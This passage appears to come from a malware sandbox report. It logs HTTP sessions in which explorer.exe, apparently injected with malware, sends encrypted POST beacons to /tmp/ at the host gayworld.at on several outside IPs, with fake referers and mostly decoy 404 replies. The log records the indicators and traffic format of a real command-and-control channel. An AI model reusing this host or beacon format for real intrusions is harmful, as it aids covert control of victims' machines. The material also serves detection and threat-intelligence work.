61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  3192.168.2.549696123.213.233.19480C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:20:42.553354025 CEST106OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://bflbsmk.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 253
                  Host: gayworld.at
                  Oct 10, 2022 23:20:42.553417921 CEST106OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 2c 5e a6 9d
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu,^/UYZI'Opow\@]MJu&#2rC^>q`%[/Vu}e19,"DX-)hWdFs+
                  Oct 10, 2022 23:20:43.730217934 CEST107INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:20:43 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  30192.168.2.549725175.120.254.980C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:40.937239885 CEST178OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://vyenmgvrby.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 158
                  Host: gayworld.at
                  Oct 10, 2022 23:21:40.937269926 CEST179OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 58 5f d0 a4
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vuX_vLBt,rtC1Eb)HE2<+tvR
                  Oct 10, 2022 23:21:41.830338001 CEST179INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:41 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  31192.168.2.549726123.213.233.19480C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:42.125679016 CEST180OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://exqejm.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 369
                  Host: gayworld.at
                  Oct 10, 2022 23:21:42.125813007 CEST181OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 3e 3b c0 8b
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu>;]=DXiqsGER.wq0fu0l&UDDn9HC<Tr~6N4G!1qNCwI/nk_Rl90 #
                  Oct 10, 2022 23:21:43.298779011 CEST181INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:42 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  32192.168.2.549727123.213.233.19480C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:43.610588074 CEST182OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://slnpxfm.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 268
                  Host: gayworld.at
                  Oct 10, 2022 23:21:43.610588074 CEST183OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 3a 50 e2 e2
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu:PXr}aT~\*/g5Wk]3M},j{t#&j{V0'|jC\ kuC>MdeS$
                  Oct 10, 2022 23:21:44.790632963 CEST183INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:44 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  33192.168.2.549728123.213.233.19480C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:45.102165937 CEST184OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://nnpxrhckg.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 307
                  Host: gayworld.at
                  Oct 10, 2022 23:21:45.105804920 CEST185OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 2b 25 c2 9b
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu+%QNf7*#I*=A{P!MK)_At-24@}/"!PJK56c *9&:Hb75U(f]oQ
                  Oct 10, 2022 23:21:46.274468899 CEST185INHTTP/1.1 200 OK
                  Date: Mon, 10 Oct 2022 21:21:45 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 0
                  Connection: close
                  Content-Type: text/html; charset=utf-8


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  34192.168.2.549729175.120.254.980C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:46.586225986 CEST186OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://dotgqhetjk.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 144
                  Host: gayworld.at
                  Oct 10, 2022 23:21:46.586250067 CEST186OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 40 21 f9 bd
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu@!gkfn9=C=+)J_{GLUg]
                  Oct 10, 2022 23:21:47.767224073 CEST187INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:47 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 50
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1f 62 43 e4 37 01 fe ef 46 ea d0 ec a6 6d 81 3e d9 f7 22 5e 5a 85 84 8b cb 7c 9a 2e 1d 03
                  Data Ascii: #\6bC7Fm>"^Z|.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  35192.168.2.549731185.95.186.5880C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:21:49.526122093 CEST809OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://xkovywjrdl.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 179
                  Host: gayworld.at
                  Oct 10, 2022 23:21:49.528737068 CEST810OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 15 6b 2c 90 f4 76 0b 75 52 0b d8 b6
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA ,[k,vuRNuf#RbZJ.r{R~$kVEC"P4m0P@j(C!'
                  Oct 10, 2022 23:21:49.898238897 CEST810INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:49 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  4192.168.2.549697195.158.3.16280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:20:43.995908022 CEST108OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://cqvxwnkwk.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 112
                  Host: gayworld.at
                  Oct 10, 2022 23:20:43.995985985 CEST108OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 2e 4a b9 fc
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu.JG8ob@L$X
                  Oct 10, 2022 23:20:44.546792030 CEST109INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:20:44 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  5192.168.2.549698123.213.233.19480C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:20:44.841478109 CEST110OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://lqmaakrhx.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 256
                  Host: gayworld.at
                  Oct 10, 2022 23:20:44.841505051 CEST110OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 24 0a c8 a3
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu$fO}qH`!f.fD,i `=M(<,Ajt6X2h,*%^6 zfr\7GsM{0_ciBB!
                  Oct 10, 2022 23:20:45.722624063 CEST111INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:20:45 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  6192.168.2.549699195.158.3.16280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:20:45.875778913 CEST112OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://dhmlysw.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 222
                  Host: gayworld.at
                  Oct 10, 2022 23:20:45.875801086 CEST112OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 50 5a e0 8b
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vuPZxMxH&Si9&(NGGI0$OZH2.+U~neWa) >$Yz{Z@%4xuw@5
                  Oct 10, 2022 23:20:46.409559011 CEST113INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:20:46 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
